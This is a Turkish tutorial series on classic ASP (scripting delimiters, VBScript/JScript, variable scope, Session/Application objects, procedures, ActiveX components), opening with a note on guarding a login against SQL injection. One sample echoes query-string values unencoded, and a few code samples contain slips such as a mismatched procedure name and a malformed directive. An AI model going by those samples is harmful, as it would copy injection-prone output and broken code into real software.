Yukarıda makalenin ilk başında bahsettiğim 5 temel prensibin hepsi bu login işleminde uygulandı. TextBox nesnelerine girilebilecek max karakter sayısının kısıtlanması ile çalışabileck Sql deyimleri girilemez. Aynı şekilde RegularExpressionValidator ifadeleri ile özel karakterlerin girilmesi önlenlenmiş oldu. Yine ConnectionString ifademizde benim yarattığım bir kullanıcı ile bağlanılıyor. Bu kullanıcıya sadece StoredProcedure’leri çalıştırılmasına izin veriliyor. Böylece başka herhangi bir sql komutunun çalışmasına olanak tanınmıyor. Çünkü veritabanına bağlanan kullanıcının yapabildikleri kısıtlanmıştır. SqlCommandType’in özelliği Stored Procedure olarak ayarlanmış ve böylece dinamik SQL ifadelerinin kullanılması engellenmiş olur. Stored Procedure’e aktarılan parametrelerde şifrelenerek veritabanında, şifrelenmiş olarak duran kayıtlarla karşılaştırlır.

Elbette web uygulamasının içerisinde, login sayfasından farklı sayfalarda yer alan TextBox nesneleri ile kötü niyetli kullanıcılar veritabanımıza dolayısıyla web uygulamamıza zarar verebilirler. Örneğin, herkesin bildiği site içerisinde arama yapabilmemizi sağlayan TextBox nesnelerine girilen değerlerde kontrol edilmelidir.

Bu makalenin içerisinde yer alan kodları daha iyi anlayabilmek için, makale içinde geçen bazı konuları (FormsAuthentication, Verileri Şifreleme, RegularExpressionValidator, Stored Procedure) yine aspnedir.com sitesinden okumanızı tavsiye ederim.

· Metin
· HTML etiketleri
· ASP betik komutları
Bir .asp dosyası yaratmak kolaydır. Betik eklemek istediğiniz bir HTML dosyasının varolan .htm ya da .html uzantısını .asp ile değiştirin. .asp dosyasını ağ kullanıcılarına açık hale getirmek için dosyayı sitenizde bir dizine kaydedin. (dizinin “Script” ve “Execute” haklarının açık olduğundan emin olun) Dosyayı tarayıcınızda görüntülediğiniz zaman, ASP nin dosyayı işlediğini ve bir HTML sayfası dödürdüğünü göreceksiniz. Artık .asp dosyasına betik komutları ekleyebilirsiniz.

NOT: .asp dosyaları ekstra işlem gerektirdiğinden, bütün HTML sayfalarınızı ASP sayfalarına çevirmeyin. Sadece betik komutları içerecek olan HTML dosyalarınızı .asp dosyalarına çevirin. .asp ve .htm dosyalarını aynı dizin içinde bulundurabilirsiniz. .asp dosyalarını yaratmak için herhangi bir metin düzenleyiciyi kullanabilirsiniz. Microsoft Visual InterDev gibi ASP için gelişmiş destek içeren bir düzenleyiciyi daha kullanışlı bulabilirsiniz. Daha önce HTML kullanmadıysanız, Microsoft Front Page i de kullanabilirsiniz. Front Page ile yarattığınız HTML sayfalarınıza da Insert Script komutu ile basit ASP komutları ekleyebilirsiniz.

Betik Komutlarının Eklenmesi
Betik, bir dizi komutlardan oluşur. Metin düzenleyen, bir ses ya da resim dosyasını açan HTML etiketlerinin aksine, betik komutları ağ sunucusuna belli eylemleri gerçekleştirme talimatı verir. Betik komutları bir kullanıcının ismini bir değişkende saklayabilir, tarayıcıya gönderilen sayfada görüntüleyebilir ya da bir veri tabanına kaydedebilir.

Betik komutları normal metinden ayraçlarla ayrılır. Ayraç, bir birimin başını ya da sonunu belirtmeye yarayan bir simge ya da simgeler dizisidir. HTML de ayraçlar, etiketleri çevreleyen küçüktür (<) ve büyüktür (>) işaretleridir.

ASP betik komutlarını çevrelemek için <% ve %> ayraçlarını kullanır. Ayraçlar içinde, kullandığınız betik dilinde geçerli olan bütün komutları kullanabilirsiniz. Aşağıdaki örnekte bir betik komutu içeren basit bir HTML sayfası gösterilmiştir.

<HTML>
<BODY>
Bu sayfa en son <%= Now %> da güncellendi.
</BODY>
</HTML>

Now adlı VBScript işlevi, o andaki tarih ve saati döndürür. Ağ sunucusu bu sayfayı işlediğinde deyiminin yerine o andaki tarih ve saati koyar ve sayfayı tarayıcıya gönderir.

Bu sayfa en son 12/15/99 22:00:00 PM.da güncellendi.
Ayraçlarla ayrılan komutlar, birincil betik komutları olarak adlandırılır. Bu komutlar, birincil betik dili kullanılarak işlenirler. Ayraçlar içindeki her komut, birincil betik dilinde geçerli olmalıdır. Varsayılan olarak, birincil betik dili VBScript dir. Başka bir betik dili de ayarlayabilirsiniz.

İstemci tarafında yapılan betiklemeye (tarayıcının işlettiği betik) aşinaysanız, HTML in <SCRIPT> etiketinin sunucu tarafındaki betiklemede (ASP) aynen kullanılmadığını göreceksiniz. Sunucu tarafı betiklemede <SCRIPT> etiketi, yalnız birincil betik dili dışında bir betik dilinin yordamlarını tanımlar.

HTML ve Betik Komutlarının Birlikte Kullanımı
ASP ayraçları içinde, birincil betik dilinizde geçerli olan bütün ifade, yordam veya işleçleri kullanabilirsiniz. VBScript ve diğer betik dillerinde bir ifade bir tür eylem ya da tanımı belirten, sözdizimsel olarak tam bir birimdir. Aşağıdaki If…Then…Else ifadesi, sık kullanılan bir VBScript ifadesidir.

<%
If Time >= #12:00:00 AM# And Time < #12:00:00 PM# Then
Selamlama = “Günaydın!”
Else
Selamlama = “Merhaba!”
End If
%>

<%= Selamlama %>

Bu ifade, Selamlama adlı değişkende “Günaydın!” ya da “Merhaba!” değerini saklar. komutu, tarayıcıya değişkenin o andaki değerini gönderir.

Bu nedenle, bu betiği öğlen 12 den önce (ağ sunucusunun saatine göre) görüntüleyen kullanıcılar “Günaydın!” mesajı ile, daha sonra görüntüleyenler ise “Merhaba!” mesajı ile karşılaşırlar.

Bir ifadenin bölümleri içerisine HTML metni de girebilirsiniz. Örneğin bir If…Then…Else ifadesinin içerisine HTML de karıştıran aşağıdaki örnek de önceki örnekle aynı sonucu doğurur.

<% If Time >= #12:00:00 AM# And Time < #12:00:00 PM# Then %>
Günaydın!
<% Else %>
Merhaba!
<% End If %>

Koşul doğru ise, yani saat gece 12 ile öğlen 12 arasında ise ağ sunucusu koşulu takip eden “Günaydın!” HTML metnini tarayıcıya gönderir, koşul sağlanmıyorsa da “Merhaba!” HTML metni tarayıcıya gönderilir. Bu şekilde HTML ve betik komutlarının karıştırılması / birlikte kullanılması, birkaç satır HTML metninin bir If…Then…Else ifadesiyle çevrelenmesi için kullanışlıdır. Önceki örnek, bir selamlama metnini sayfanızın çeşitli yerlerinde tekrar tekrar göstermek istediğiniz durumda daha iyidir. Bir değişkene bir kez değer verir ve tekrar tekrar kullanabilirsiniz.

HTML metinlerini betik komutlarının arasına serpiştirmek yerine, tarayıcıya bir betik komutu içinden de HTML metni gönderebilirsiniz. Tarayıcıya metin döndürmek için ASP nin varolan Response nesnesini kullanın. Takip eden örnek de önceki betiklerle aynı sonucu doğurur.

<%
If Time >= #12:00:00 AM# And Time < #12:00:00 PM# Then
Response.Write “Günaydın!”
Else
Response.Write “Merhaba!”
End If
%>

Response.Write kendisini takip eden metni tarayıcıya gönderir. Response.Write ı tarayıcıya döndürülen metni devingen olarak yaratmak istediğinizde kullanın. Örneğin birden çok değişkenin değerini içeren bir damga dizisi yaratmak isteyebilirsiniz. İlerleyen bölümlerde Response nesnesi ve diğer nesneler hakkında daha fazla bilgiyi ilerleyen kesimlerde öğreneceksiniz. Şimdilik bir HTML sayfasına betik yerleştirmek için değişik yollar olduğunu bilmeniz yeterlidir.

JScript ile çalışıyorsanız bir ifade bloğunu temsil eden yaylı parantezleri HTML etiketleri ve metin arasına serpiştirerek ASP komutlarınıza yerleştirebilirsiniz. Örneğin:

<% if (screenresolution == “low”) { %>
Bu, sayfanın metin sürümüdür.
<% } else { %>
Bu, sayfanın çoklu ortam sürümüdür.
<% } %>

ASP Talimatlarının Kullanılması
ASP, kullandığınız betik diline dahil olmayan bazı talimatları da içerir. Bu talimatlar, çıktı talimatı ve işleme talimatlarıdır. <%= ifade %> şeklindeki ASP çıktı talimatı, bir değişkenin değerini gösterir. Bu çıktı talimatı, Response.Write kullanmak ile aynı şeydir. Örneğin, çıktı deyimi, “tırmanma” kelimesini (değişkenin o andaki değeri) tarayıcıya yollar. <%@ anahtar kelime%> şeklindeki ASP işleme deyimi, ASP ye bir .asp dosyasının işlenmesi için gereken bir bilgi verir. Örneğin aşağıdaki talimat sayfanın birincil betik dilinin VBScript olduğunu belirtir:

<%@ LANGUAGE=VBScript %>

İşleme talimatı, bir .asp dosyasının ilk satırında yer almalıdır. İşleme talimatını #include deyimi ile içerilen bir dosyaya koymayın. @ işareti ve anahtar kelime arasına bir boşluk koyun.

İşleme talimatı, aşağıdaki anahtar kelimeleri kullanır:

. LANGUAGE anahtar kelimesi sayfanın betik dilinin atanmasında kullanılır.
. CODEPAGE anahtar kelimesi kod sayfasını (damga kodlama çeşidini) seçer.
. LCID anahtar kelimesi sayfanın yerel belirtecini kurar.
. TRANSACTION anahtar kelimesi, sayfanın bir işlem bağlamında çalışacağını belirler.
. ENABLESESSIONSTATE anahtar kelimesi, bir ASP sayfasının oturum durumu kullanıp kullanmadığını belirtir.
Bir talimatta birden çok anahtar kelimeye yer verebilirsiniz; anahtar kelime / değer çiftleri boşluklarla ayrılmalıdır. Eşittir işareti (=) etrafına boşluk koymayın. Aşağıdaki örnek hem betik dilini hem de kod sayfasını seçmektedir.

<%@ LANGUAGE=JScript CODEPAGE=932 %>

Betiklerdeki Boş Alanlar
Birincil betik diliniz VBScript ya da JScript ise, ASP komutlardaki boş alanları temizler. Diğer betik dilleri için ASP boşluk alanları korur ve böylece metin / komut konumu gibi etmenlere bağlı olan Python gibi dillerin de doğru bir şekilde yorumlanması sağlanır. Sözü edilen boşluk alanları, boşluk karakterleri, satır sonu karakterleri gibi damgalardır.

VBScript ve JScript için ise, açılış ayracından sonra ve kapanış ayracından önce komutların daha kolay okunması açısından boşluk alanlar kullanabilirsiniz. Aşağıdaki komutların tümü geçerlidir.

<% Color = “Green” %>

<%Color=”Green”%>

<%
Color = “Green”
%>

ASP, bir ifadenin bitiş ayracı ve ondan sonraki ifadenin başlangıç ayracı arasında kalan boşluk alanları da yok eder. Bu ifadeler arasındaki boşluk alanları korumak istiyorsanız HTML deki “nbsp” (bozulamaz boşluk karakteri) karakterini kullanın. Örneğin:

<%
‘Dizgi değeri içeren iki değişken tanımlayın.
Betik = “betik”
Dili = “dili”
%>
<P>VBScript bir “<%=Betik%> <%=Dili%>” dir.</P>

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde yayınlanmıştır.

Kolay Gelsin

ASP, ağ geliştiricilerinin çeşitli betik dilleri kullanarak eksiksiz yordamlar yazabilmelerine olanak verir. Çeşitli betik dilleri bir tek .asp dosyası içinde kullanılabilir. Buna ek olarak, betikler sunucu tarafında okunup işlendiği için istemci tarayıcının betik desteği olmasına da gerek yoktur.

Ağ sunucunuzda uygun betik motoru kurulu olan her betik dilini kullanabilirsiniz. Bir betik motoru belli bir dilde yazılan komutları işleyen bir programdır. ASP iki betik motoru ile birlikte gelir; Microsoft VBScript ve Microsoft JScript. REXX ve Perl gibi diğer betik dillerinin betik motorlarını da yükleyip kullanabilirsinz.

Bir Visual Basic programcısı iseniz, Visual Basic in bir alt kümesi sayılabilecek olan VBScript i kullanmaya hemen başlayabilirsiniz. Java, C ya da C++ programcısı iseniz, JScript sözdizimini kendinize yakın bulacaksınız. Yalnız, JScript Java ya da C ile ilişkili değildir.

ASP bir ActiveX betikleme platformudur. Bir dili kullanmak için ActiveX Betik Standardı na uyan ve ağ sunucunuzda bir COM (Common Object Model / Ortak Nesne Modeli) nesnesi olarak duran bir betik motoru kurmalısınız.

Birincil Betik Dilinin Atanması
ASP birincil betik dili, <% ve %> ayraçları içinde verilen komutları işlemek için kullanılan dildir. Bir ASP uygulamasında sayfa başına bir ya da uygulamadaki tüm sayfalar için bir birincil betik dili atayabilirsiniz.

Bir Sayfa için Dil Atanması
Tek bir sayfanın birincil betik dilini atamak için .asp dosyanızın başına <%@ LANGUAGE %> komutunu ekleyin. Bu komutun sözdizimi:

<%@ LANGUAGE=BetikDili %>
Burada BetikDili tek bir sayfanın birincil betik dilidir. Sayfanın dil seçimi ASP uygulaması için yapılan dil seçiminin umursanmamasını sağlar.

ASP komutlarının kullanılması için verilen talimatları izleyin, daha fazla bilgi için:

NOT: Object.Method (Nesne.Yordam / İşlev) sözdizimini kullanmayan bir dili birincil betik dili olarak kullanmak istiyorsanız öncelikle LanguageEngines kayıt anahtarını yaratmanız gerekmektedir (Bakınız Windows Kayıt Düzenleyicisi: Regedit).

Bir Uygulama için Geçerli Dilin Atanması
Bir uygulamadaki her sayfa için geçerli olan birincil betik dilini atamak için, Internet Hizmet Yöneticisi’ndeki (Internet Service Manager) App Options (Uygulama Seçenekleri) bölümünde Default ASP Language (Varsayılan ASP Dili) özelliğini ayarlayın.

Sunucuda VBScript ve JScript Kullanımı
Sunucuda ASP ile VBScript kullanırken, VBScript in iki özelliği kullanılamaz. ASP betikleri sunucuda çalıştırıldığı için, InputBox ve MsgBox kullanıcı arayüzü ögeleri desteklenmemektedir. Ayrıca, CreateObject ve GetObject adlı VBScript işlevlerini de sunucu tarafı betiklerinde kullanmayınız. Bunun yerine Server.CreateObject kullanınız, böylece ASP yaratılan nesneyi takip edebilir. CreateObject ve GetObject ile yaratılan nesneler, ASP nin kendi nesnelerine erişemezler ve işlemlerde yer alamazlar. Bir istisna, Admin Objects (Yönetici Nesneleri) kullanıldığı durumdur.

Açıklama Satırlarının Dahil Edilmesi
Bütün ASP betiklerinin işlenmesi sunucu tarafında yapıldığı için, betiklemeyi desteklemeyen tarayıcılardan betiklerin saklanması için HTML açıklama satırı etiketlerinin kullanılmasına gerek yoktur. Bütün ASP komutları, tarayıcıya gönderilmeden önce işlenirler. Bir HTML sayfasına açıklamalar ekleyebilirsiniz. Bu açıklamalar tarayıcıya gönderilir ve kullanıcı kaynak HTML i gömek isterse görülürler.

VBScript Açıklamaları
Kesme işareti kullanarak açıklama satırları yazma VBScript de mümkündür. HTML açıklamalarının aksine, bunlar betik işlenirken ayıklanırlar ve tarayıcıya gönderilmezler.

<%
‘Bu satır ve aşağıdaki satırlar açıklamadır.
‘DiziYaz işlevi bir dizinin tüm
‘elemanlarını listeler.
Call DiziYaz (Dizi())
%>

Bir çıktı deyimine açıklama ekleyemezsiniz. Örneğin aşağıdaki betik komutlarından birincisi çalışır ancak ikincisi çalışmaz çünkü ikincisi <%= ile başlamaktadır:

<% i = i +1 ‘i yi 1 arttırır. Bu satır çalışır. %>
<%= name ‘değişken değerini yazar. Bu satır çalışmaz%>

JScript Açıklamaları // açıklama simgeleri JScript de desteklenmiştir. Bu simgeler her açıklama satırında kullanılmalıdır.
<% Call TarihYaz %>
<SCRIPT LANGUAGE=JScript RUNAT=Server>
// Bu, TarihYaz işlevi için bir tanımdır
function TarihYaz()
{
var x
x = new Date()
// Bu satır şu andaki tarihi tarayıcıya gönderir,
Response.Write(x.toString())
}
</SCRIPT>

Büyük-Küçük Harf Ayrımı
VBScript büyük-küçük harf ayrımı yapmaz. ASP nin Request nesnesini kullanmak için Request ya da request yazabilirsiniz. Büyük-küçük ayrımının yapılmamasının bir sonucu değişken isimlerinin bu ayrımla ayırdedilememesidir. Örneğin renk ve Renk adında iki ayrı değişken kullanamazsınız.

JScript büyük-küçük harf ayrımı yapar. Örneğin Date yerine date yazmak bir hata oluşturur. Bu dökümanda bahsedilen ASP nesnelerinin yazılış biçimi, JScript de geçerlidir. (Response gibi.)

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde yayınlanmıştır.

Kolay Gelsin

Değişkenlerin Bildirilmesi ve İsimlendirilmesi
Değişkenleri tanımlarken ve isimlendirirken kullandığınız betik dilinin kurallarına uyun. Bir değişkeni kullanmadan önce tanımlamanız gerekmese de, hataların önlenmesi açısından değişkenlerin tanımlanması iyi bir alışkanlıktır. Bir değişken tanımlamak demek, betik motoruna o isimde bir değişkenin varolduğunu ve betik boyunca isminin / değerinin kullanılabileceğini söylemek demektir.

VBScript
VBScript de değişkenlerin önceden tanımlanmasına gerek yoktur, ancak değişkenlerin kullanılmadan önce tanımlanması iyi bir alışkanlıktır. VBScript de bir değişken tanımlamak için Dim, Public, ya da Private ifadelerinden birini kullanın. Örneğin:

<% Dim KullaniciAdi %>

VBScript deki Option Explicit ifadesini bir .asp dosyasında da kullanabilirsiniz, böylece değişkenlerin açık bir şekilde bildirilmesini zorunlu kılmış olursunuz. Option Explicit ifadesi herhangi bir ASP talimatından sonra ve HTML metni ve betik komutlarından önce gelmelidir. Bu ifade yalnızca VBScript ile yazılan ASP komutlarını etkiler, JScript komutları üzerinde bir etkisi yoktur.

JScript
Microsoft JScript sadece bir yordamın yerel değişkenlerinin tanımlanmasını gerekli kılar, fakat burada da bütün değişkenlerin kullanılmadan önce tanımlanmaları iyi bir alışkanlıktır. Bir değişken tanımlarken var ifadesini kullanın. Örneğin:

<% var KullaniciAdi; %>

Değişkenlerin Etkinlik Alanları
Bir değişkenin etkinlik alanı ya da yaşam süresi hangi betik komutlarının o değişkene erişebileceğini belirtir. Bir yordam içinde tanımlanan değişkenin yerel etkinlik alanı vardır. Yordam her işletilişinde değişken yaratılır ve tekrar yok edilir. Yordamın dışındaki herhangi bir şeyden bu değişkene erişilemez. Bir yordamın dışında tanımlanan değişkenin ise evrensel (global) etkinlik alanı vardır. ASP sayfasındaki her komut bu değişkene erişebilir ve değerini değiştirebilir.

Bir yerel değişken ve bir evrensel değişkenin adları aynı olabilir. Birinin değerinin değişmesi, diğerininkini değiştirmeyecektir. Eğer değişkenleri tanımlamıyorsanız, bir yordam içinde istemeden evrensel değişkenin değerini değiştirebilirsiniz. Örneğin aşağıdaki betik komutları Y adında iki değişken olmasına rağmen 1 değerini döndürür:

<%
Dim Y
Y = 1
Call YerelDegiskeneAktar
Response.Write Y

Sub YerelDegiskeneAktar
Dim Y
Y = 2
End Sub
%>

Aşağıdaki betik komutları ise 2 değerini döndürür, çünkü değişkenler açıkça tanımlanmamıştır. Yordam, Y nin değerine 2 atadığı zaman, betik motoru bunun evrensel değişkene atanmak istediğini varsayar:

<%
Y = 1
Call YerelDegiskeneAktar
Response.Write Y

Sub SetLocalVariable
Y = 2
End Sub
%>

Olabilecek problemleri önlemek için, bütün değişkenleri ayrı ayrı tanımlama alışkanlığı edinin. Bu, özellikle ASP sayfanıza #include ifadesi kullanarak diğer dosyaların içerilmesini sağlarken önemlidir. Dahil edilen betik başka bir dosyada tutulmaktadır, ancak aynı dosyanın bir parçası gibi işlem görmektedir. Değişkenleri tanımlamazsanız, asıl betikte ve dahil edilen betikte farklı değişken isimleri kullanmanız gerektiğini unutabilirsiniz.

Değişkenlere Oturum ya da Uygulama Etkinlik Alanı Atama
Evrensel değişkenler yalnızca bir ASP sayfasında erişilebilirdir. Değişkenin bir sayfanın ötesinde erişilebilir olmasını sağlamak için değişkene bir oturum ya da uygulama etkinlik alanı verin. Oturum etkinlik alanına sahip değişkenler, bir ASP uygulamasında kullanıcı tarafından istenen tüm sayfalarda etkindir. Oturum değişkenleri tek bir kullanıcının bilgilerini tutmak için iyi bir yoldur. Bu bilgiler; kullanıcın kimlik bilgileri ya da tercih bilgileri vs. olabilir. Uygulama değişkenleri belli bir uygulamanın tüm kullanıcılarına ilişkin bilgilerin tutulmasında iyi bir yoldur. Bu bilgiler ise; uygulamaya özel selamlama biçimi, uygulama için gerekli olan ilk değerler vs. olabilir.

ASP, içinde değişken saklayabileceğiniz iki standart nesne sunar: Session (oturum) nesnesi ve Application (uygulama) nesnesi.

Oturum Etkinlik Alanı
Bir değişkene oturum etkinlik alanı vermek için, değişkeni Session nesnesi içinde isimlendirilmiş bir girişte saklayın. Örneğin aşağıdaki komutlar Session nesnesi içinde iki yeni değer saklar:

<%
Session(”Adi”) = “Meltem”
Session(”Soyadi”) = “Ergün”
%>

Session nesnesinden bilgi almak için isimlendirilmiş girişe, çıktı komutu (<%=) ya da Response.Write ile erişin. Aşağıdaki örnek çıkış komutunu kullanarak Session(”Adi”) nin o anki değerini göstermektedir.

Merhaba <%= Session(”Adi”) %>
Session nesnesinde kullanıcı tercihlerini de saklayabilirsiniz ve böylece kullanıcıya hangi sayfayı döndüreceğinize karar verebilirsiniz. Örneğin uygulamanızın ilk sayfasında, kullanıcıya sayfanızın sadece metin içeren bir şeklini isteme şansı verebilir ve bu seçimi takip eden tüm sayfalarda da uygulayabilirsiniz.

<% If Session(”ScreenResolution”) = “Low” Then %>
Bu sayfanın metin sürümüdür.
<% Else %>
Bu sayfanın çoklu ortam sürümüdür.
<% End If %>

Uygulama Etkinlik Alanı
Bir değişkene uygulama etkinlik alanı vermek için değişkeni Application nesnesi içindeki bir isimlendirilmiş girişte saklayın. Örneğin aşagıdaki komut, uygulamaya özel bir selamlamayı Application nesnesi içinde saklamaktadır.

<% Application(”Selamlama”) = “THY ye hoş geldiniz!” %>

Application nesnesinden bilgi alabilmek için, ASP çıkış komutunu (<%=) ya da Response.Write ı kullanarak uygulamadaki sayfaların herhangi birinden isimlendirlmiş girişe erişin. Aşağıdaki örnek, çıkış komutunu (<%=) kullanarak Application(”Selamlama”) nın değerini gösterir:

<%= Application(”Selamlama”)%>

Sabitlerin Kullanılması
Bir sabit, bir sayı ya da dizginin yerini alan bir isimdir. ASP ile birlikte gelen bazı temel bileşenler (ActiveX Veri Nesneleri-ADO gibi) betiklerinizde kullanabileceğiniz sabitler tanımlar. Bir bileşen sabitleri bir bileşen tür kütüphanesi (bir ActiveX bileşenince desteklenen nesneler ve türler hakkında bilgi tutan bir dosya) içinde saklayabilir. Global.asa dosyasında bir tür kütüphanesi oluşturduktan sonra, tanımlanan sabitleri uygulamadaki tüm betiklerde kullanabilirsiniz.

Bir tür kütüphanesi tanımlamak için, uygulamanızın Global.asa dosyasında <METADATA> etiketini kullanın. Örneğin ADO tür kütüphanesini tanımlamak için aşagıdaki ifadeleri kullanın:

<!–METADATA TYPE=”typelib”
FILE=”c:\program files\common files\system\ado\msado15.dll”
–>

Daha sonra, Global.asa dosyasıyla aynı uygulamadaki bütün betiklerde ADO sabitlerini kullanabilirsiniz. Takip eden örnekte, adOpenKeyset ve adLockOptimistic deyimleri ADO sabitleridir:

‘Recordset Nesnesini Yaratın ve Açın
Set RsMusteri = Server.CreateObject(”ADODB.Recordset”)
RsMusteri.ActiveConnection = OBJdbConnection
RsMusteri.CursorType = adOpenKeyset
RsMusteri.LockType = adLockOptimistic

ASP nin önceki sürümlerinde, bazı bileşenlerin tanımladığı sabitlerin bulunduğu dosyaların, bu sabitlerin kullanıldığı her ASP dosyasında dahil edilmesi zorunlu idi. #include ifadesinin sabit tanımlarının dahil edilmesinde kullanılması hala desteklenmektedir, ama tür kütüphanelerinin kulanımı daha kolaydır ve betiklerinizin kolayca günlenmesini sağlar. ASP nin ilerki sürümlerinde bileşenler sabitlerin tanımlandığı dosyaları sağlamayabilir.

Kendi sabitlerinizi tanımlayabilirsiniz. VBScript de Const ifadesini kullanın. JScript de ise var ifadesini kullanın. Kandi sabitlerinizi birden çok ASP sayfasında kullanmak isterseniz, tanımları ayrı bir ASP dosyasına koyun ve bu sabitleri kullanan ASP dosyalarına bu dosyayı da dahil edin.

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde tarafımca yayınlanmıştır.

Kolay Gelsin

Yordam Tanımlama
Yordam tanımları <SCRIPT> ve </SCRIPT> etiketleri arasında yer alır ve belirtilen betik dilinin kurallarına uymak zorundadır. <SCRIPT> etiketini, birincil betik dilinden ayrı bir betik dilinde yazılan yordamlar için kullanın. Birincil betik dilinde yazılan yordamlar için ise, <% ve %> betik ayraçlarını kullanın.

HTML in <SCRIPT> etiketini kullanırken, betiğin sunucu tarafında işlenmesi için iki özelliği kullanmalısınız. <SCRIPT> etiketini kullanmanın sözdizimi:

<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
yordam tanımı
</SCRIPT>

RUNAT=SERVER özelliği, ağ sunucusuna betiğin sunucuda işlenmesi gerektiğini söyler. Eğer bu özelliği kurmazsanız, betik istemci tarayıcı da işlenir. LANGUAGE özelliği bu betik bloğu için kullanılacak olan betik dilini belirtir. Betik motorunuz olan herhangi bir betik dilini kullanabilirsiniz. VBScript belirtmek için VBSCRIPT, JScript belirtmek içinse JSCRIPT değerini kullanmanız gerekir. Eğer LANGUAGE özelliğini kurmazsanız, betik bloğu birincil betik dilinde yorumlanır.

Betik bloğundaki komutlar seçilen betik dilinde bir ya da daha fazla tam yordam oluşturmalıdır. Örneğin aşağıdaki komutlar JScript dilindeki BirYordam yordamını tanımlamaktadır:

<HTML>
<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
function BirYordam()
{
Response.Write(”BirYordam çağırıldı!”)
}
</SCRIPT>

Önemli: Sunucu tarafında <SCRIPT> etiketleri arasında tam yordamların parçaları olmayan betik komutları kullanmayın. Bir yordamın bölümü olmayan komutlar, tahmin edilemeyecek sonuçlar doğurabilirler, çünkü çalıştırılma sıraları tahmin edilemez. Ayrıca, ASP çıkış komutunu (<%=) da bir yordam içinde kullanamazsınız. Bunu yerine, Response.Write kullanmalısınız.

Yordam Çağırma
Yordam çağırmak için, yordamın adını bir komutta kullanın. VBScript den JScript yordamları çağırıyorsanız, yordam isminden sonra parantez kullanın; yordamın hiçbir parametresi yoksa boş parantez kullanın. JScript den VBScript ya da JScript yordamları çağırıyorsanız, yordam adından sonra mutlaka parantez kullanın.

VBScript de yordam çağırırken Call anahtar kelimesini de kulanabilirsiniz. Yalnız, çağırdığınız yordamın parametreleri varsa bu parametreler de parantezler dahilinde verilmelidir. Call anahtar kelimesini kullanmazsanız parametreler etrafına parantez koymanıza da gerek yoktur. Call sözdizimi ile herhangi bir standart ya da kullanıcının tanımladığı işlevi çağırmak isterseniz, işlevin döndürdüğü değer atılır.

Aşağıdaki örnekte iki değişik betik dili (VBScript ve JScript) kullanılarak yordam yazılması ve çağırılması örneklenmiştir:

<%@ LANGUAGE = VBSCRIPT >%
<HTML>
<BODY>
<% Call Yaz %>
<BR>
<% Call TarihYaz() %>
</BODY>
</HTML>

<%
Sub Yaz
Response.Write “<TABLE>”
Response.Write “<TR><TH>Name</TH><TH>Value</TH></TR>”
Set Params = Request.QueryString
For Each p in Params
Response.Write “<TR><TD>” & p & “</TD><TD>” & _
Params(p) & “</TD></TR>”
Next
Response.Write “</TABLE>”
End Sub
%>

<SCRIPT LANGUAGE=JScript RUNAT=Server>
function TarihYaz()
{
var x
x = new Date()
Response.Write(x.toString())
}
</SCRIPT>

Dizilerin Yordamlara Parametre Olarak Gönderilmesi
VBScript de bir dizinin tümünü bir yordama göndermek için, dizi isminden sonra boş parantez kullanın; JScript de ise boş köşeli parantez kullanın.

Not; Bu yazı 04 Aralık 2003 tarihinde http://www.sorucevap.com/uyeler/dersler.asp?maxiturk adresinde tarafımca yayınlanmıştır.

Kolay Gelsin

Bileşenler Hakkında
Bir ActiveX bileşeni, belli bir işi ya da belli işleri yapan program kodu içeren bir dosyadır. Bileşenler sık kullanılan işleri yaparlar, böylece bu işleri yapmak için kendi kodunuzu yazmanıza gerek yoktur. ASP, veri tabanı erişim bileşeni (Database Access Component) gibi hemen kullanabileceğiniz temel bileşenlerle birlikte gelir. Daha sonra başka bazı bileşenleri dışardan edinebilir ya da kendi bileşenlerinizi yazabilirsiniz.

Bileşenleri, betikleriniz ya da ağ uygulamalarınızın temel taşları olarak kullanırsınız. Betik dillerinde yeniyseniz, bileşenleri kullanan betikleri bileşenlerin nasıl çalıştığını bilmeden yazabilirsiniz. Sadece bilmeniz gereken, bileşenlerin sağladığı nesnelere nasıl erişmeniz gerektiğidir. Bileşenler, programlama öğrenmeden iyi betikler yazabilmenizi sağlar.

Ağ uygulaması geliştiricisiyseniz, iş mantığını çevreleyen bileşenler yazabilirsiniz. Örneğin bir ürünün satışında satış vergisini hesaplayan bir bileşen yazabilirsiniz. Daha sonra bu bileşeni belli bir siparişi işleyen bir betikten çağırabilirsiniz. Vergi hesaplanması işini sipariş işinden ayırarak belli bir bölge için vergi düzenlemeleri değiştiğinde yazdığınız bileşeni kolayca günleyebilirsiniz. C, C++, Java ya da Visual Basic gibi COM u (Common Object Model / Ortak Nesne Modeli) destekleyen tüm programlama dillerinde bileşen yazabilirsiniz. COM programlama ile ilişkiniz varsa; ActiveX bileşenleri otomasyon sunucularıdır. Ağ sunucusunda çalışacaklarsa, ActiveX bileşenleriniz MsgBox işlevi gibi görsel ögelere sahip olmamalıdır.

Bileşenler tekrar kullanılabilir. Bir bileşeni ağ sunucunuza kurduğunuz zaman, onu bir ASP betiğinden, bir ISAPI uygulamasından, sunucudaki diğer bir bileşenden ya da başka bir COM-uyumlu programlama dilinde yazılan bir programdan çağırabilirsiniz.

Bir Bileşene Ait Nesnenin Bir Örneğinin Yaratılması
Bir bileşen, bir dinamik kütüphane (.dll) ya da çalıştırılır dosyada (.exe) tutulan çalıştırılır koddur. Bileşen, bir ya da daha fazla nesne ve onun / onların yordamlarını (method) ve özelliklerini içerir. Bir bileşenin sağladığı nesneyi kullanmak için nesnenin bir örneğini oluşturursunuz ve bu yeni örneğe bir değişken ismi atarsınız. ASP nin Server.CreateObject yordamını kullanarak nesne örneği yaratın. Kullandığınız betik dilinin değişken atama sözdizimini kullanarak nesne örneğinize bir isim verin.

Örneğin ASP AdRotator nesnesinin bir örneğinin yaratılması aşağıdaki gibidir:

VBScript ile:

<% Set MyAds = Server.CreateObject(”MSWC.AdRotator”) %>
JScript ile:

<% var MyAds = Server.CreateObject(”MSWC.AdRotator”) %>
HTML <OBJECT> etiketini kullanarak da nesne örnekleri yaratabilirsiniz. RUNAT ve ID özelliklerini belirtmelisiniz. Nesneyi ya onun PROGID si ya da CLSID si ile tanımlayabilirsiniz:

<OBJECT RUNAT=Server ID=MyAd PROGID=”MSWC.AdRotator”></OBJECT>

ya da

<OBJECT RUNAT=Server ID=MyAd
